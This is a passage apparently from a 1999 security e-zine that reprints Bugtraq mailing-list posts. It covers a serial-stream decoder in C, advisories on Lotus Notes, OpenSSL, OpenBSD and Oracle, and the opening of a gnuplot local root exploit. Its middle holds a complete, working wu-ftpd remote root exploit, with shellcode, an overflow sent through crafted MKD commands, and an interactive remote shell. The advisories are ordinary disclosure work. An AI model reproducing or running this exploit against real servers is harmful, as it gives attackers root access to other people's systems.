line[200]; /* array used to format 112 bit data chunks */ static int lc=0; /* pointer to position in array line */ if (l == -1) { /* printf (" %2i\n",asp); */ sl = 0x0000; s = 0; synd = 0; if ((asp <12) && (lc > 50)) { ll = 12 - asp; for (ll=0; ll<6; ll++) { v = 0; for (k=7; k>=0; k--) { b = line[ (ll<<3) +k ]; v = v << 1; if ( b == 49) v++; } ob[obp] = (char) v; if (obp < 999) obp++; } } lc = 0; tap = asp; asp = 0; return(tap); } else { s++; if (s==1) { line[lc] = (char) l; lc++; } /* update sliding buffer */ sl = sl << 1; sl = sl & 0x7fff; if (l == 49) sl++; if (s >1) { s = 0; if ((sl & 0x2000) > 0) t1 = 1; else t1 = 0; if ((sl & 0x0800) > 0) t1^=1; if ((sl & 0x0020) > 0) t1^=1; if ((sl & 0x0002) > 0) t1^=1; if ((sl & 0x0001) > 0) t1^=1; /* attempt to identify, correct certain erroneous bits */ synd = synd << 1; if (t1 == 0) { asp++; synd++; } nsy = 0; if ( (synd & 0x0001) > 0) nsy++; if ( (synd & 0x0004) > 0) nsy++; if ( (synd & 0x0020) > 0) nsy++; if ( (synd & 0x0040) > 0) nsy++; if ( nsy >= 3) /* assume bit is correctable */ { printf ("*"); synd = synd ^ 0x65; line[lc - 7] ^= 0x01; /**********************************************/ } } } return(0); } void shob() { int i1,i2,j1,j2,k1; /* update file output buffer */ i1 = obp / 18; if ( (obp-(i1*18)) > 0) i1++; fob[fobp] = (char) (i1 & 0xff); if (fobp < 29999) fobp++; for (i2 = obp; i2<=(obp+20); i2++) ob[i2] = 0; for (j1 = 0; j1 < i1; j1++) { for (j2 = 0; j2 < 18; j2++) { k1 = j2 + (j1*18); printf("%02X ", ob[k1] & 0xff); fob[fobp] = (char) (ob[k1] & 0xff); if (fobp < 29999) fobp++; } printf (" "); for (j2 = 0; j2 < 18; j2++) { k1 = j2 + (j1*18); if (ob[k1] >=32) printf("%c",ob[k1]); else printf("."); } printf("\n"); } obp=0; printf("BUFFER: %3i percent full\n",(int)(fobp/299.0)); } /**********************************************************************/ /* frame_sync */ /**********************************************************************/ /* this routine recieves the raw bit stream and tries to decode it */ /* the first step is frame synchronization - a particular 40 bit */ /* long sequence indicates the start of each data frame. Data frames */ /* are always 112 bits long. After each 112 bit chunk this routine */ /* tries to see if the message is finished (assumption - it's finished*/ /* if the 40 bit frame sync sequence is detected right after the end */ /* of the 112 bit data chunk). This routine also goes back to hunting */ /* for the frame sync when the routine processing the 112 bit data */ /* chunk decides there are too many errors (transmitter stopped or */ /* bit detection routine skipped or gained an extra bit). */ /* */ /* inputs are fed to this routine one bit at a time */ /* input : 48 - bit is a zero */ /* 49 - bit is a 1 */ void frame_sync(char gin) { static unsigned int s1=0,s2=0,s3=0,nm,j,t1,t2,t3,ns=0,st=0,n,m,l,chu=0,eef=0; static char ta[200]; if (st == 1) { ta[ns] = gin; ns++; if (ns >= 112) /* process 112 bit chunk */ { chu++; ns = 0; for (n= 0; n<16; n++) { for (m=0; m<7; m++) { l = n + (m<<4); pork(ta[l]); } } if (pork(-1) > 20) eef++; else eef=0; if (eef > 1) /* if two consecutive excess error chunks - bye */ { st = 0; shob(); eef = 0; } /* else eef = 0; */ } } /* s1,s2,s3 represent a 40 bit long buffer */ s1 = (s1 << 1) & 0xff; if ((s2 & 0x8000) > 0) s1++; s2 = (s2 << 1); if ((s3 & 0x8000) > 0) s2++; s3 = (s3 << 1); if (gin == 49) s3++; /* xor with 40 bit long sync word */ t1 = s1 ^ 0x0007; t2 = s2 ^ 0x092A; t3 = s3 ^ 0x446F; /* find how many bits match up */ /* currently : the frame sync indicates system id / idling / whatever */ /* inverted frame sync indicates message follows */ nm = 0; for (j=0; j<16; j++) { if (t1 & 1) nm++; if (t2 & 1) nm++; if (t3 & 1) nm++; t1 = t1 >> 1; t2 = t2 >> 1; t3 = t3 >> 1; } if (nm < 5) { st = 1; ns = 0; } else if (nm > 35) { if (st==1) { shob(); } st = 0; ns = 0; } } void main (int argc) { unsigned int n,i=0,j,k,l,cw1=49,cw0=48; FILE *out; char s=48; double pl,dt,exc=0.0,clk=0.0,xct; if (argc > 1) { printf ("Reverse Polarity.\n"); cw1 = 48; cw0 = 49; } /* dt is the number of expected clock ticks per bit */ dt = 1.0/(4800.0*838.8e-9); oldfuncc = getvect(0x0c); /* save COM1 Vector */ setvect (0x0c, com1int); /* Capture COM1 vector */ n = inportb (0x21); /* enable IRQ4 interrupt */ outportb(0x21, n & 0xef); set8253(); /* set up 8253 timer chip */ set8250(); /* set up 8250 UART */ while ((kbhit() == 0) && (fobp<29900)) { if (i != cpstn) { if ( ( fdata[i] & 0x8000) != 0) s = cw1; else s = cw0; /* add in new number of cycles to clock */ clk += (fdata[i] & 0x7fff); xct = exc + 0.5 * dt; /* exc is current boundary */ while ( clk >= xct ) { frame_sync(s); clk = clk - dt; } /* clk now holds new boundary position. update exc slowly... */ /* 0.005 sucks; 0.02 better; 0.06 mayber even better; 0.05 seems pretty good */ exc = exc + 0.020*(clk - exc); i++; if( i >buflen) i = 0; } } outportb (0x21, n); /* disable IRQ4 interrupt */ setvect (0x0c, oldfuncc); /* restore old COM1 Vector */ /* save captured data to disk file */ i = 0; out = fopen("data.dat","wt"); if (out == NULL) { printf ("couldn't open output file.\n"); exit(1); } i = 0; while ( (i < fobp) && (i < 29800)) { j = ((int)fob[i] & 0xff); i++; for (k=0; k<j; k++) { for (l=0; l<18; l++) { fprintf(out,"%02X ",((int) fob[i + l]&0xff)); } fprintf(out," "); for (l=0; l<18; l++) { n = ((int)fob[i]&0xff); i++; if (n >=32) fprintf(out,"%c",n); else fprintf(out,"."); } fprintf(out,"\n"); } fprintf(out,"\n"); } fclose(out); } @HWA 30.0 Bugtraq: Lotus Notes security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To: BUGTRAQ@netspace.org Security advisory Advisory released Mar 23 1999 ----- Application: Lotus Notes Client (Version 4.5, probably others) Impact: Encrypted mail sent from the Notes client may traverse the network in the clear and may be stored on the mail server unencrypted. Author: Martin Bartosch ----- Synopsis -------- When performing network analysis experiments with the Lotus Notes Client a very subtle bug was discovered that may lead to inadvertent revelation of confidential information. Usually the Notes client sends at least two copies of a newly created mail. One copy is sent to the recipient, the other is stored in the "Sent Mail" folder of the sender's Notes server. If an encrypted mail is to be sent and the conditions for this bug are met, the copy for the sender's "Sent Mail" folder is not encrypted. As a result, the message is sent to the Notes server in the clear and stored on the Notes server unencrypted. The message may thus be intercepted and read by analyzing the network traffic between the sender's Notes client and the server or by directly accessing the "Sent Mail" folder on the Notes server. The user is not given any warning or notification about the problem, and the problem causes almost no noticable side effects. As a result, if a user is affected by the problem, this will probably remain unnoticed. Lotus is currently working on the problem, a detailed analysis and official fixes may be available soon. Once this is available, it should be preferred to the workaround presented in this document. Details ------- The problem seems to result from an inadequate check condition in the client code. Traditionally Windows, DOS and OS/2 use the backslash character ('\') as a path separator, whereas Unix systems use the slash ('/') for this purpose. Applications that deal with both styles need to be aware of the problem and have to take care of paths passed to applications or services on other systems. The user's database usually is located on a remote server. Though Notes clients are normally Windows style systems, the servers may either run Windows, OS/2 or Unix as the server operating system. Thus Notes needs to take care of proper translation of file paths as files are accessed on various platforms. Notes accesses databases by specifying the server and the path to the database. In order to open a user's database in the first place, the user needs to enter the correct path to the database or traverse the directory tree on the server. When the database has been opened, Notes remembers the path to the database for subsequent access to this database. Internally the Notes client seems to store the path to the database using the client operating system file naming conventions. In particular, on Windows or OS/2 platforms, Notes uses Backslash characters ('\') as path separators. The current Notes environment settings may be changed by opening the environment document (File/Mobile/Edit current environment). In the second entry of the section "Mail" the path to the mail file can be changed by the user. Notes uses this entry for various purposes. One of these is the periodical check for new mail or agenda events. (If the user specifies an incorrect path here, mail notification does not work any longer.) To address the backslash-slash problem, Notes seems to translate any path entered by the user into the proper representation needed for accessing the service required. Apparently it does not matter at all if paths are entered with slashes or backslashes as path separators. The GUI dialogs accept any spelling as well as the environment document mentioned above. However, if for some reason the environment document of a Windows style client specifies the mail file with *slashes* as a path separator (like e. g. mail/users/user.nsf instead of mail\users\user.nsf) Notes does a proper translation of the path and almost all functions will work as expected. Except for one side effect: Notes does not recognize the specified database as the user's mail database. Probably a simple string compare between the currently opened mail database and the database path of the environment document is performed, and this comparison fails because of the different representation of paths. The resulting effect: if an encrypted mail is to be sent and the environment document does contain a mail database path with 'incorrect' path separators as seen from the client OS view, the mail copy for the user's "Sent Mail" folder is being sent to the user's database in the plain and stored unencrypted on the server. The contents of the message may be read in plain text by sniffing on the network or by directly accessing the notes database. The behaviour described can be reproduced with almost any Notes client and server combination. Even if both the server and client use the same operating system, it is still possible to enter the mail path separated with slash characters. The Notes client will behave as described above. Detection --------- - compose a new mail message - address this message to some other user - using the mail properties dialog enable encryption for this individual message - send message - change to the "Sent Mail" folder of your mail database - right-click on the sent message once - open the properties dialog for this document - choose "fields" in the document properties - check existence of the fields "$Seal", "$SealData" and "Body" Under normal circumstances the "$Seal"/"$SealData" and "Body" fields are mutually exclusive. The existence of "$Seal" and "$SealData" usually indicate that the message was properly encrypted. If the field "Body" exists, this message is stored in the plain on the server and was transferred unencrypted across the network. Alternatively the network traffic can be analyzed while sending an encrypted mail. This is how the bug was discovered in the first place. Workaround ---------- The workaround described here may be an incomplete fix for the problem; the problem may be triggered by other conditions as well. As Lotus is actively investigating on the problem, the solution presented by Lotus may be more general and should be preferred once it is available. First method: Open your environment document. The path to the database must *not* contain any path separator characters that are not natively used by the client operating system. When using a Windows or OS/2 environment, the path must only contain backslash '\' characters. Example: Mail File: mail\path\to\user.nsf * OK * Mail File: mail/path/to/user.nsf * DANGER! * A client restart is required to make the changes effective. Second method: In your global preferences check the "Encrypt saved mail" box. Every message you send will be encrypted when saving the message to the "Sent Mail" folder on the server. Use both methods to be sure that mail sent by the client is not sent and stored in the clear. Be aware that using the second methond will result in encryption of the whole database and that loss of your passphrase or Notes ID will effectively cause loss of your mail database contents. Vendor activities ----------------- Lotus has been informed of this bug and is currently working on the problem. An official fix or workaround will be published by Lotus. Credits ------- Michael Doberenz; Michael Popp whose network analysis experiments revealed that there was a problem in the first place Artur Hahn found the real reason (path separator issue) for the Notes encryption problem -- Martin Bartosch bartosch@mail.deuba.com This message and any statements expressed therein are those of myself and not of the Deutsche Bank AG or its subsidiary companies. @HWA 31.0 Bugtraq: New FTP exploit ~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from smtp3.xs4all.nl (smtp3.xs4all.nl [194.109.6.53]) by netspace.org (8.8.7/8.8.7) with ESMTP id LAA25208 for <BUGTRAQ@netspace.org>; Mon, 22 Mar 1999 11:10:17 -0500 Received: from xs3.xs4all.nl (pietern@xs3.xs4all.nl [194.109.6.44]) by smtp3.xs4all.nl (8.8.8/8.8.8) with ESMTP id RAA03847 for <BUGTRAQ@netspace.org>; Mon, 22 Mar 1999 17:10:23 +0100 (CET) Received: from localhost (pietern@localhost) by xs3.xs4all.nl (8.9.0/8.9.0) with ESMTP id RAA18937 for <BUGTRAQ@netspace.org>; Mon, 22 Mar 1999 17:10:23 +0100 (CET) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: <Pine.BSI.4.10.9903221702080.18430-100000@xs3.xs4all.nl> Date: Mon, 22 Mar 1999 17:10:23 +0100 Reply-To: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL> Subject: ftp exploit To: BUGTRAQ@netspace.org /* THIS IS PRIVATE! DO NOT DISTRIBUTE!!!! PRIVATE! WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1) for linux x86 (redhat 5.2) by duke duke@viper.net.au BIG thanks to stran9er for alot of help with part of the shellcode! i fear stran9er, but who doesn't? !@$ :) Greets to: #!ADM, el8.org users, To exploit this remotely they need to have a directory you can have write privlidges to.. this is the <dir> argument.. you can also use this locally by specifying -l <ur login> -p <urpass> with the <dir> = your home directory or something..(must begin with '/') also alignment arg is how return address is aligned.. shouldnt need it, but if u do it should be between 0 and 3 It takes about 10 seconds after "logged in" so be patient. -duke */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> //#include <linux/time.h> //#include <sys/select.h> #include <sys/time.h> #include <unistd.h> #define RET 0xbfffa80f void logintoftp(); void sh(); void mkd(char *); int max(int, int); long getip(char *name); char shellcode[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x17\xcd\x80" "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" "\xeb\x4f\x31\xc0\x31\xc9\x5e\xb0\x27\x8d\x5e\x05\xfe\xc5\xb1\xed" "\xcd\x80\x31\xc0\x8d\x5e\x05\xb0\x3d\xcd\x80\x31\xc0\xbb\xd2\xd1" "\xd0\xff\xf7\xdb\x31\xc9\xb1\x10\x56\x01\xce\x89\x1e\x83\xc6\x03" "\xe0\xf9\x5e\xb0\x3d\x8d\x5e\x10\xcd\x80\x31\xc0\x88\x46\x07\x89" "\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd" "\x80\xe8\xac\xff\xff\xff"; char tmp[256]; char name[128], pass[128]; int sockfd; int main(int argc, char **argv) { char sendln[1024], recvln[4048], buf1[800], buf2[1000]; char *p, *q, arg, **fakeargv = (char **) malloc(sizeof(char *)*(argc + 1)); int len, offset = 0, i, align=0; struct sockaddr_in cli; if(argc < 3){ printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]); exit(0); } for(i=0; i < argc; i++) { fakeargv[i] = (char *)malloc(strlen(argv[i]) + 1); strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1); } fakeargv[argc] = NULL; while((arg = getopt(argc,fakeargv,"l:p:a:o:")) != EOF){ switch(arg) { case 'l': strncpy(name,optarg,128); break; case 'p': strncpy(pass,optarg,128); break; case 'a': align=atoi(optarg); break; case 'o': offset=atoi(optarg); break; default: printf("usage: %s <host> <dir> [-l name] [-p pass] [-a <alignment>] [-o offset]\n", argv[0]); exit(0); break; } } if(name[0] == 0) strcpy(name, "anonymous"); if(pass[0] == 0) strcpy(pass, "hi@blahblah.net"); bzero(&cli, sizeof(cli)); bzero(recvln, sizeof(recvln)); bzero(sendln, sizeof(sendln)); cli.sin_family = AF_INET; cli.sin_port = htons(21); cli.sin_addr.s_addr=getip(argv[1]); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((len = read(sockfd, recvln, sizeof(recvln))) > 0){ recvln[len] = '\0'; if(strchr(recvln, '\n') != NULL) break; } logintoftp(sockfd); printf("logged in.\n"); bzero(sendln, sizeof(sendln)); for(i=align; i<996; i+=4) *(long *)&buf2[i] = RET + offset; memcpy(buf2, "a", align); memset(buf1, 0x90, 800); memcpy(buf1, argv[2], strlen(argv[2])); mkd(argv[2]); p = &buf1[strlen(argv[2])]; q = &buf1[799]; *q = '\x0'; while(p <= q){ strncpy(tmp, p, 200); mkd(tmp); p+=200; } mkd(shellcode); mkd("bin"); mkd("sh"); p = &buf2[0]; q = &buf2[999]; while(p <= q){ strncpy(tmp, p, 250); mkd(tmp); p+=250; } sh(sockfd); close(sockfd); printf("finit.\n"); } void mkd(char *dir) { char snd[512], rcv[1024]; char blah[1024], *p; int n; struct timeval tv; fd_set fds; bzero(&tv, sizeof(tv)); tv.tv_usec=50; bzero(blah, sizeof(blah)); p = blah; for(n=0; n<strlen(dir); n++){ if(dir[n] == '\xff'){ *p = '\xff'; p++; } *p = dir[n]; p++; } sprintf(snd, "MKD %s\r\n", blah); write(sockfd, snd, strlen(snd)); bzero(snd, sizeof(snd)); sprintf(snd, "CWD %s\r\n", blah); write(sockfd, snd, strlen(snd)); bzero(rcv, sizeof(rcv)); FD_ZERO(&fds); FD_SET(sockfd,&fds); select(sockfd+1,&fds,NULL,NULL,&tv); if (FD_ISSET(sockfd,&fds)) while((n = read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void logintoftp() { char snd[1024], rcv[1024]; int n; printf("logging in with %s: %s\n", name, pass); memset(snd, '\0', 1024); sprintf(snd, "USER %s\r\n", name); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } memset(snd, '\0', 1024); sprintf(snd, "PASS %s\r\n", pass); write(sockfd, snd, strlen(snd)); while((n=read(sockfd, rcv, sizeof(rcv))) > 0){ rcv[n] = 0; if(strchr(rcv, '\n') != NULL) break; } return; } void sh() { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(sockfd, snd, strlen(snd)); for(;;){ FD_SET(fileno(stdin), &rset); FD_SET(sockfd, &rset); maxfd = max(fileno(stdin), sockfd) + 1; select(maxfd, &rset, NULL, NULL, NULL); if(FD_ISSET(fileno(stdin), &rset)){ bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd)-2, stdin); write(sockfd, snd, strlen(snd)); } if(FD_ISSET(sockfd, &rset)){ bzero(rcv, sizeof(rcv)); if((n = read(sockfd, rcv, sizeof(rcv))) == 0){ printf("EOF.\n"); exit(0); } if(n < 0){ perror("read"); exit(-1); } fputs(rcv, stdout); } } } int max(int x, int y) { if(x > y) return(x); return(y); } long getip(char *name) { struct hostent *hp; long ip; if ((ip=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { fprintf(stderr,"Can't resolve host.\n"); exit (1); } memcpy(&ip, (hp->h_addr), 4); } return ip; } @HWA 32.0 Bugtraq: OpenSSL and SSLeay Advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ OpenSSL and SSLeay Security Alert --------------------------------- It was recently realised that packages that use SSLeay and OpenSSL may suffer from a security problem: under some circumstances, SSL sessions can be reused in a different context from their original one. This may allow access controls based on client certificates to be bypassed. Unfortunately, before the the problem was fully understood, it was discussed on various public lists. The OpenSSL team have therefore decided to release an interim version of OpenSSL which addresses the problem by disabling session reuse except in limited circumstances (see below). A future version will deal with the problem more elegantly by redoing verification on reused sessions when necessary. Although this problem is not strictly a defect in OpenSSL, it is rather tricky for applications to be coded correctly to avoid the problem due to the sketchy nature of SSLeay/OpenSSL documentation. We therefore decided to protect applications from within OpenSSL. The problem ----------- SSL sessions include a session ID which allows initial setup to be bypassed once a session has been established between a client and server. This session ID, when presented by the client, causes the same master key to be used as was used on the previous connection, thus saving considerable session setup time. When the session is reused in this manner, all access controls based on client certificates are bypassed, on the grounds that the original session would have made the necessary checks. Unfortunately, the lack of documentation has resulted in the caching structures being used in certain applications without appropriate care being taken to assure that the cached sessions are only available at the appropriate moments. As a result it is sometimes possible for a specially written SSL client to fraudulently obtain an SSL connection which requires access control by reusing a previous session which had different or no access control. The problem affects servers which support session reuse and which have multiple virtual hosts served from a single server, where some virtual hosts use differing client server verifications. Note that "different" includes no verification on some hosts, and verification on others, or different CAs for different hosts. In order to exploit this problem carefully written client software would need to be written. The attacker would need considerable knowledge of the SSL protocol. Standard web browsers will not and cannot be made to use SSL in this way. Affected software ----------------- All server software using SSLeay or versions of OpenSSL prior to version 0.9.2b that support multiple virtual hosts with different client certificate verification may be vulnerable. This includes, but is not limited to: Apache-SSL http://www.apache-ssl.org/ mod_ssl http://www.engelschall.com/sw/mod_ssl/ Raven http://www.covalent.net/ Stronghold http://www.c2.net/ The solution ------------ Download OpenSSL 0.9.2b (see http://www.openssl.org) and build it in the usual way. Check the application for updates, and download those, too (NB: this step is not necessarily required, the updated library will fix the problem). The versions of the applications listed above that you should use are: Apache_SSL 1.3.4+1.32 mod_ssl 2.2.6-1.3.4 Raven 1.4.0 Stronghold 2.4.2 Rebuild the application (if needed). If you are an application author, you should look in to the use of SSL_set_session_id_context(), which can be used to reenable session reuse when appropriate. Known exploits -------------- There are no known exploits of this security hole. Ben Laurie, for the OpenSSL team. -- http://www.apache-ssl.org/ben.html "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi @HWA 33.0 Recent OpenBSD security advisories ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.openbsd.org/security.html#24 Approved-By: aleph1@UNDERGROUND.ORG Received: from cvs.openbsd.org (root@cvs.openbsd.org [199.185.137.3]) by netspace.org (8.8.7/8.8.7) with ESMTP id PAA26180 for <BUGTRAQ@netspace.org>; Tue, 2 Mar 1999 15:08:12 -0500 Received: from cvs.openbsd.org (IDENT:deraadt@localhost [127.0.0.1]) by cvs.openbsd.org (8.9.3/8.9.1) with ESMTP id NAA19006 for <BUGTRAQ@netspace.org>; Tue, 2 Mar 1999 13:08:25 -0700 (MST) Message-ID: <199903022008.NAA19006@cvs.openbsd.org> Date: Tue, 2 Mar 1999 13:08:22 -0700 Reply-To: Theo de Raadt <deraadt@CVS.OPENBSD.ORG> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: Theo de Raadt <deraadt@CVS.OPENBSD.ORG> Subject: New OpenBSD security-related patches To: BUGTRAQ@netspace.org There are a couple of new OpenBSD 2.4 security-related patches at http://www.openbsd.org/security.html#24 We do not normally publish long wordy advisories to mailing lists (not enough time in the day). That said, I'm surprised that other readers of BUGTRAQ don't advise each other (publically) when new entries show up in our patches archive. I'm sure some of these fixes affect other systems.. -=- "If we are so much greater than the sum of all our parts how come we're 90% water?" - Ed -=- From the site: OpenBSD 2.4 Security Advisories These are the OpenBSD 2.4 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.3 advisories listed below are fixed in OpenBSD 2.4. Mar 22, 1999: The nfds argument for poll(2) needs to be constrained, to avoid kvm starvation (patch included). Mar 21, 1999: A change in TSS handling stops another kernel crash case caused by the crashme program (patch included). Feb 25, 1999: An unbounded increment on the nlink value in FFS and EXT2FS filesystems can cause a system crash. (patch included). Feb 23, 1999: Yet another buffer overflow existed in ping(8). (patch included). Feb 19, 1999: ipintr() had a race in use of the ipq, which could permit an attacker to cause a crash. (patch included). Feb 17, 1999: A race condition in the kernel between accept(2) and select(2) could permit an attacker to hang sockets from remote. (patch included). Feb 17, 1999: IP fragment assembly can bog the machine excessively and cause problems. (patch included). Feb 12, 1999: i386 T_TRCTRAP handling and DDB interacted to possibly cause a crash. (patch included). Feb 11, 1999: TCP/IP RST handling was sloppy. (patch included). Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). Nov 19, 1998: There is a possibly locally exploitable problem relating to environment variables in termcap and curses. (patch included). Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). OpenBSD 2.3 Security Advisories These are the OpenBSD 2.3 advisories -- all these problems are solved in OpenBSD current. Obviously, all the OpenBSD 2.2 advisories listed below are fixed in OpenBSD 2.3. Nov 27, 1998: There is a remotely exploitable problem in bootpd(8). (patch included). Nov 13, 1998: There is a remote machine lockup bug in the TCP decoding kernel. (patch included). Jul 2, 1998: setuid and setgid processes should not be executed with fd slots 0, 1, or 2 free. (patch included). August 31, 1998: A benign looking resolver buffer overflow bug was re-introduced accidentally (patches included). June 6, 1998: Further problems with the X libraries (patches included). June 4, 1998: on non-Intel i386 machines, any user can use pctr(4) to crash the machine. May 17, 1998: kill(2) of setuid/setgid target processes too permissive (4th revision patch included). May 11, 1998: mmap() permits partial bypassing of immutable and append-only file flags. (patch included). May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). OpenBSD 2.2 Security Advisories These are the OpenBSD 2.2 advisories. All these problems are solved in OpenBSD 2.3. Some of these problems still exist in other operating systems. (The supplied patches are for OpenBSD 2.2; they may or may not work on OpenBSD 2.1). May 5, 1998: Incorrect handling of IPSEC packets if IPSEC is enabled (patch included). May 1, 1998: Buffer overflow in xterm and Xaw (CERT advisory VB-98.04) (patch included). Apr 22, 1998: Buffer overflow in uucpd (patch included). Apr 22, 1998: Buffer mismanagement in lprm (patch included). Mar 31, 1998: Overflow in ping -R (patch included). Mar 30, 1998: Overflow in named fake-iquery (patch included). Mar 2, 1998: Accidental NFS filesystem export (patch included). Feb 26, 1998: Read-write mmap() flaw. Revision 3 of the patch is available here Feb 19, 1998: Sourcerouted Packet Acceptance. A patch is available here. Feb 13, 1998: Setuid coredump & Ruserok() flaw (patch included). Feb 9, 1998: MIPS ld.so flaw (patch included). Dec 10, 1997: Intel P5 f00f lockup (patch included). OpenBSD 2.1 Security Advisories These are the OpenBSD 2.1 advisories. All these problems are solved in OpenBSD 2.2. Some of these problems still exist in other operating systems. (If you are running OpenBSD 2.1, we would strongly recommend an upgrade to the newest release, as this patch list only attempts at fixing the most important security problems. In particular, OpenBSD 2.2 fixes numerous localhost security problems. Many of those problems were solved in ways which make it hard for us to provide patches). Sep 15, 1997: Deviant Signals (patch included) Aug 2, 1997: Rfork() system call flaw (patch included) Jun 24, 1997: Procfs flaws (patch included) Watching our Security Changes Since we take a proactive stance with security, we are continually finding and fixing new security problems. Not all of these problems get widely reported because (as stated earlier) many of them are not confirmed to be exploitable; many simple bugs we fix do turn out to have security consequences we could not predict. We do not have the time resources to make these changes available in the above format. Thus there are usually minor security fixes in the current source code beyond the previous major OpenBSD release. We make a limited guarantee that these problems are of minimal impact and unproven exploitability. If we discover that a problem definitely matters for security, patches will show up here VERY quickly. @HWA 34.0 Oracle is insecure at initial installation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from majestic.tcs.tulane.edu (majestic.tcs.tulane.edu [129.81.224.6]) by netspace.org (8.8.7/8.8.7) with ESMTP id QAA32299 for <BUGTRAQ@netspace.org>; Thu, 4 Mar 1999 16:37:24 -0500 Received: from xftpd (h107.s156.tulane.edu [129.81.156.107]) by majestic.tcs.tulane.edu (8.9.3/8.9.3) with SMTP id PAA09523 for <BUGTRAQ@netspace.org>; Thu, 4 Mar 1999 15:36:58 -0600 (CST) MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4 Importance: Normal Message-ID: <000201be6688$33466770$6b9c5181@xftpd.tulane.edu> Date: Thu, 4 Mar 1999 15:44:37 -0600 Reply-To: James Kivisild <kivisild@MAILHOST.TCS.TULANE.EDU> Sender: Bugtraq List <BUGTRAQ@netspace.org> From: James Kivisild <kivisild@MAILHOST.TCS.TULANE.EDU> Subject: Oracle Plaintext Password To: BUGTRAQ@netspace.org I now know this has been mentioned before, however I've gotten a large number of responses from people about Oracle problems similar to this. As a first time Oracle installer, I didn't realize the scope of the problem. I hope that upon reading this, more people will realize that the Default settings under Oracle just aren't secure. Original Post to NTBugtraq: I apologize if this has been mentioned before, however I haven't had any time to pursue this issue with any vigor. I recently installed Oracle 8.0.3 Enterprise Edition on an NT 4.0 Workstation and I noticed a particular feature within Oracle Database Assistant v1.0 that might be of some interest/concern. During the creation of an Oracle database, the Database Assistant lets you create either a custom or typical(default) database. If you select "custom" database, you must enter a master password that controls the administrative features in the database. If you select "typical", this password defaults to 'oracle'. As the database is created, the Server Manager reports all activities to a log file. This log file, "\orant\database\spoolmain.log", even logs the master password as it connects to the server to continue the setup. The entry is as follows: Echo ON SVRMGR> connect INTERNAL/MYPASSWORD Connected. Not only is this password in plaintext, but the file has permissions that enable anyone to view it. (owned by Admins, but full control for everyone) I believe the setup informs you that the file exists and should be checked for errors, but I didn't find any other reference to it in the documentation. The log does get overwritten each time you create a new database, however that just limits the number of plaintext passwords to one. Once again, I haven't had time to look into this, but it seems like a potential problem worth mentioning. -James Kivisild @HWA 35.0 GnuPlot buffer overflow exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Approved-By: aleph1@UNDERGROUND.ORG Received: from inferno.tusculum.edu (qmailr@inferno.tusculum.edu [206.228.254.202]) by netspace.org (8.8.7/8.8.7) with SMTP id QAA02678 for <bugtraq@netspace.org>; Thu, 4 Mar 1999 16:55:02 -0500 Received: (qmail 484 invoked by uid 1111); 4 Mar 1999 21:55:18 -0000 Message-ID: <19990304215518.483.qmail@inferno.tusculum.edu> Date: Thu, 4 Mar 1999 21:55:18 -0000 Reply-To: xnec@INFERNO.TUSCULUM.EDU Sender: Bugtraq List <BUGTRAQ@netspace.org> From: xnec@INFERNO.TUSCULUM.EDU Subject: Linux /usr/bin/gnuplot overflow To: BUGTRAQ@netspace.org greetings, INFO: There is a local root comprimise in /usr/bin/gnuplot version Linux version 3.5 (pre 3.6) patchlevel beta 336. gnuplot is shipped to install suidroot on SuSE 5.2 and maybe others. The exploit starts as a simple $HOME buffer overflow, but much like zgv holes in the past, it drops root privs before the overflow occurs. However, as Nergal describes at http://www.geek-girl.com/bugtraq/1998_4/0148.html, svgalib needs write access to /dev/mem, and we can therefore regain root privs by overwriting our uid. the offending code appears in plot.c where we see: char home[80]; ... char *tmp_home=getenv(HOME); ... strcpy(home,tmp_home); EXPLOIT: xnec_plot.c ---snip--- /* gnuplot Linux x86 exploit from xnec tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2 gnuplot ships suidroot by default in SuSE 5.2, maybe others 